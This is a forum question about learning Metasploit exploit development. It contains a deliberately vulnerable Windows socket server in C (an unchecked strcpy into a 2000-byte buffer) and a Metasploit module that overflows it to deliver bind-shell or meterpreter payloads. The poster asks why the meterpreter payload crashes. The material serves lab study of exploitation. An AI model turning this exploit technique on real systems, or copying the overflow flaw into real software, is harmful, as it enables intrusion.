Ask A Question

Questions

1
ANSWERED

Metasploit: Problems with Meterpreter payload [pschoenb]

I am in the process of learning the art of penetration testing and also how to work with Metasploit, including the development of new exploits. As a first test for exploit development, I wrote a little Windows server: ```c /* server.cpp */ #include "stdafx.h" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <errno.h> #include <time.h> /* Headerfiles für Windows */ #include <winsock.h> #include <io.h> /* Portnummer */ #define PORT 1234 /* Puffer für eingehende Nachrichten */ #define RCVBUFSIZE 8192 #define INBUFSIZE 2000 static void echo(SOCKET); static void error_exit(char *errorMessage); static void outputString(char* buffer, time_t zeit); /* AUsgabe der Client Informationen */ static void echo(SOCKET client_socket) { char echo_buffer[RCVBUFSIZE]; int recv_size; time_t zeit; if((recv_size = recv(client_socket, echo_buffer, RCVBUFSIZE - 1,0)) < 0) error_exit("Fehler bei recv()"); // echo_buffer[recv_size] = '\0'; time(&zeit); outputString(echo_buffer, zeit); } static void outputString(char* buffer, time_t zeit) { char in_buffer[INBUFSIZE]; strcpy(in_buffer, buffer); printf("Nachrichten vom Client : %s \t%s", in_buffer, ctime(&zeit)); } /* Fehlerausgabe*/ static void error_exit(char *error_message) { fprintf(stderr,"%s: %d\n", error_message, WSAGetLastError()); exit(EXIT_FAILURE); } int main( int argc, char *argv[]) { struct sockaddr_in server, client; SOCKET sock, fd; int len; #ifdef _WIN32 WORD wVersionRequested; WSADATA wsaData; wVersionRequested = MAKEWORD (1, 1); if (WSAStartup (wVersionRequested, &wsaData) != 0) error_exit( "Fehler beim Initialisieren von Winsock"); else printf("Winsock initialisiert\n"); #endif /* Erzeuge das Socket. */ sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock < 0) error_exit("Fehler beim Anlegen eines Sockets"); /* Erzeuge die Socketadresse des Servers. */ memset( &server, 0, sizeof (server)); /* IPv4-Verbindung */ server.sin_family = AF_INET; /* INADDR_ANY: jede IP-Adresse annehmen */ server.sin_addr.s_addr = htonl(INADDR_ANY); /* Portnummer */ server.sin_port = htons(PORT); /* Bindung an einen bestimmten Port. */ if(bind(sock,(struct sockaddr*)&server, sizeof( server)) < 0) error_exit("Socket bind error\"binden\""); /* Verbindung akzeptieren */ if(listen(sock, 5) == -1 ) error_exit("Fehler bei listen"); /* Alles was ankommt ausgeben*/ while(1) { len = sizeof(client); fd = accept(sock, (struct sockaddr*)&client, &len); printf("Server ready\n"); if (fd < 0) error_exit("Fehler bei accept"); printf("Bearbeite den Client mit der Adresse: %s\n", inet_ntoa(client.sin_addr)); /* Bildschirmausgabe */ echo( fd ); /* Schließe die Verbindung. */ closesocket(fd); } return EXIT_SUCCESS; } ``` My corresponding exploit looks like this: ```ruby require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp #The names of the exploit module and the class are 'equal' def initialize(info = {}) super(update_info(info, 'Name' => 'Buffer Overflow in test server', 'Description' => %q{ This module exploits a buffer overflow found in a special test server used to explore exploit writing. }, #End of Description 'Author' => 'Patrick Schoenbach', #Change this value with your (nick)name 'License' => MSF_LICENSE, 'Version' => '$Revision: 1 $', 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Payload' => { 'Space' => 2000, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Targets' => [ # Target 0 [ 'Windows 7', { 'Platform' => 'win', #We exploit a Windows target 'Ret' => 0x0018D4DC } ], ], 'DefaultTarget' => 0 ) #End of update_info() ) #End of super() register_options( [ Opt::RPORT(1234) ], self.class) end #End of initialize def exploit connect print_status("Trying target #{target.name}...") nullSize = 4 request = payload.encoded request << make_nops(nullSize) # overwrite EBP request << [target.ret].pack('V') request << "\x00" * nullSize print_status("Total string length: #{request.length}") sock.puts(request) handler disconnect #We disconnect from the server end #End of exploit end #End of class ``` When using a simple payload like "windows/shell_bind_tcp", the exploit works as expected. However, when using the payload "windows/meterpreter/bind_tcp", I get an access violaton in the server, and I have no idea what actually goes wrong. Could someone enlighten me please what could be the problem? Sorry for posting so much code, but without the code, the problem would not be reproducable.

Posted by Edward Sheehy 6 days ago